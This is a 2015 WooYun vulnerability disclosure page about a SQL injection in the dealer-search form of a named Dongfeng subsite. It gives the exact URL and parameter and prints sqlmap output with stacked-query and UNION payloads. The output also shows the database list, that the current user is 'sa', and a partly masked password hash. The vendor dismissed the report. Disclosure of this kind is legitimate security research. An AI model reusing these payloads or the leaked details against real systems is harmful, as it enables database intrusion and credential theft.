当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134035

漏洞标题:东风日产某分站sql注入漏洞(sa权限)

相关厂商:东风日产乘用车公司

漏洞作者: 日出东方

提交时间:2015-08-14 09:15

修复时间:2015-08-14 09:53

公开时间:2015-08-14 09:53

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt
不知道重复没
菜鸟挖洞不容易呀

详细说明:

http://www.dfcv.com.cn/Service.aspx
4s店查询那里 post 注入
参数 ctl00%24MainContent%24txtDealerName
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ctl00$MainContent$txtDealerName (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwULLTExOTg5MjA2OTgPZBYCZg9kFgICAw9kFgJmD2QWCAIBD2Q
WCgIBDxYCHgVjbGFzc2VkAgMPFgIfAGVkAgUPFgIfAAUFaG92ZXJkAgcPFgIfAGVkAgkPFgIfAGVkAgM
PEA8WBh4NRGF0YVRleHRGaWVsZAUMUHJvdmluY2VOYW1lHg5EYXRhVmFsdWVGaWVsZAUKUHJvdmluY2V
JRB4LXyFEYXRhQm91bmRnZBAVJA/or7fpgInmi6nnnIHku70J5YyX5Lqs5biCCeWkqea0peW4ggnmsrP
ljJfnnIEJ5bGx6KW/55yBCeWGheiSmeWMugnovr3lroHnnIEJ5ZCJ5p6X55yBDOm7kem+meaxn+ecgQn
kuIrmtbfluIIJ5rGf6IuP55yBCeWuieW+veecgQnmtZnmsZ/nnIEJ56aP5bu655yBCeaxn+ilv+ecgQn
lsbHkuJznnIEJ5rKz5Y2X55yBCea5luWMl+ecgQnmuZbljZfnnIEJ5bm/5Lic55yBCeW5v+ilv+WMugn
mtbfljZfnnIEJ5Zub5bed55yBCeS6keWNl+ecgQnotLXlt57nnIEJ6KW/6JeP5Yy6CemZleilv+ecgQn
nlJjogoPnnIEJ6Z2S5rW355yBCeWugeWkj+WMugnmlrDnlobljLoJ6YeN5bqG5biCBummmea4rwbmvrP
pl6gG5Y+w5rm+BuWbveWklhUkAAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgI
xNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNRQrAyR
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIJDxYCHgtfIUl0ZW1Db3VudGZkAgs
PDxYCHgtSZWNvcmRjb3VudGZkZGSO28Yzywapkf574ZbtaeGXGzhhYmG3nF1YmxMhOQrJKg==&__EVEN
TVALIDATION=/wEWJwLBkabeBwL445+1BwL3jLXbCwL2jLXbCwL1jLXbCwL0jLXbCwLzjLXbCwLyjLXb
CwLxjLXbCwLgjLXbCwLvjLXbCwL3jPXYCwL3jPnYCwL3jP3YCwL3jMHYCwL3jMXYCwL3jMnYCwL3jM3Y
CwL3jNHYCwL3jJXbCwL3jJnbCwL2jPXYCwL2jPnYCwL2jP3YCwL2jMHYCwL2jMXYCwL2jMnYCwL2jM3Y
CwL2jNHYCwL2jJXbCwL2jJnbCwL1jPXYCwL1jPnYCwL1jP3YCwL1jMHYCwL1jMXYCwL1jMnYCwKMkfXV
CAKjkJHZAqiugOxWThMVC+5R6g080+Hhc51nJm9KnzY585p+nI1R&ctl00$MainContent$ddlProvin
ce=&ctl00$MainContent$txtDealerName=a';WAITFOR DELAY '0:0:5'--&ctl00$MainContent
$btnSearch=
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: __VIEWSTATE=/wEPDwULLTExOTg5MjA2OTgPZBYCZg9kFgICAw9kFgJmD2QWCAIBD2Q
WCgIBDxYCHgVjbGFzc2VkAgMPFgIfAGVkAgUPFgIfAAUFaG92ZXJkAgcPFgIfAGVkAgkPFgIfAGVkAgM
PEA8WBh4NRGF0YVRleHRGaWVsZAUMUHJvdmluY2VOYW1lHg5EYXRhVmFsdWVGaWVsZAUKUHJvdmluY2V
JRB4LXyFEYXRhQm91bmRnZBAVJA/or7fpgInmi6nnnIHku70J5YyX5Lqs5biCCeWkqea0peW4ggnmsrP
ljJfnnIEJ5bGx6KW/55yBCeWGheiSmeWMugnovr3lroHnnIEJ5ZCJ5p6X55yBDOm7kem+meaxn+ecgQn
kuIrmtbfluIIJ5rGf6IuP55yBCeWuieW+veecgQnmtZnmsZ/nnIEJ56aP5bu655yBCeaxn+ilv+ecgQn
lsbHkuJznnIEJ5rKz5Y2X55yBCea5luWMl+ecgQnmuZbljZfnnIEJ5bm/5Lic55yBCeW5v+ilv+WMugn
mtbfljZfnnIEJ5Zub5bed55yBCeS6keWNl+ecgQnotLXlt57nnIEJ6KW/6JeP5Yy6CemZleilv+ecgQn
nlJjogoPnnIEJ6Z2S5rW355yBCeWugeWkj+WMugnmlrDnlobljLoJ6YeN5bqG5biCBummmea4rwbmvrP
pl6gG5Y+w5rm+BuWbveWklhUkAAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMgIxMwIxNAIxNQIxNgI
xNwIxOAIxOQIyMAIyMQIyMgIyMwIyNAIyNQIyNgIyNwIyOAIyOQIzMAIzMQIzMgIzMwIzNAIzNRQrAyR
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZAIJDxYCHgtfIUl0ZW1Db3VudGZkAgs
PDxYCHgtSZWNvcmRjb3VudGZkZGSO28Yzywapkf574ZbtaeGXGzhhYmG3nF1YmxMhOQrJKg==&__EVEN
TVALIDATION=/wEWJwLBkabeBwL445+1BwL3jLXbCwL2jLXbCwL1jLXbCwL0jLXbCwLzjLXbCwLyjLXb
CwLxjLXbCwLgjLXbCwLvjLXbCwL3jPXYCwL3jPnYCwL3jP3YCwL3jMHYCwL3jMXYCwL3jMnYCwL3jM3Y
CwL3jNHYCwL3jJXbCwL3jJnbCwL2jPXYCwL2jPnYCwL2jP3YCwL2jMHYCwL2jMXYCwL2jMnYCwL2jM3Y
CwL2jNHYCwL2jJXbCwL2jJnbCwL1jPXYCwL1jPnYCwL1jP3YCwL1jMHYCwL1jMXYCwL1jMnYCwKMkfXV
CAKjkJHZAqiugOxWThMVC+5R6g080+Hhc51nJm9KnzY585p+nI1R&ctl00$MainContent$ddlProvin
ce=&ctl00$MainContent$txtDealerName=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL
,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113)+CHAR(83)+CHAR(108)+
CHAR(65)+CHAR(68)+CHAR(110)+CHAR(106)+CHAR(85)+CHAR(82)+CHAR(98)+CHAR(76)+CHAR(1
13)+CHAR(98)+CHAR(120)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL-- &ctl00$MainContent$btnSearch=
---
[08:57:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
7个库
available databases [7]:
[*] CVWeb
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
current user: 'sa'
password hash: 0x0100620e9c8157e54f7a50db7374f1--5c7aef6095f89561f842
没有试能不能执行命令,只是挖洞。。
over++

漏洞证明:

rt

修复方案:

121

版权声明:转载请注明来源 日出东方@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-14 09:53

厂商回复:

感谢提醒!但是该站不属于我司业务管辖范围。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-14 10:03 | 日出东方 ( 普通白帽子 | Rank:161 漏洞数:20 )

    大哥 都是一个集团的

  2. 2015-08-18 18:35 | ShAdow丶 ( 实习白帽子 | Rank:76 漏洞数:9 | i am a fans of kimYeWon.)

    @日出东方 看到这厂商给的rank就没欲望挖了 。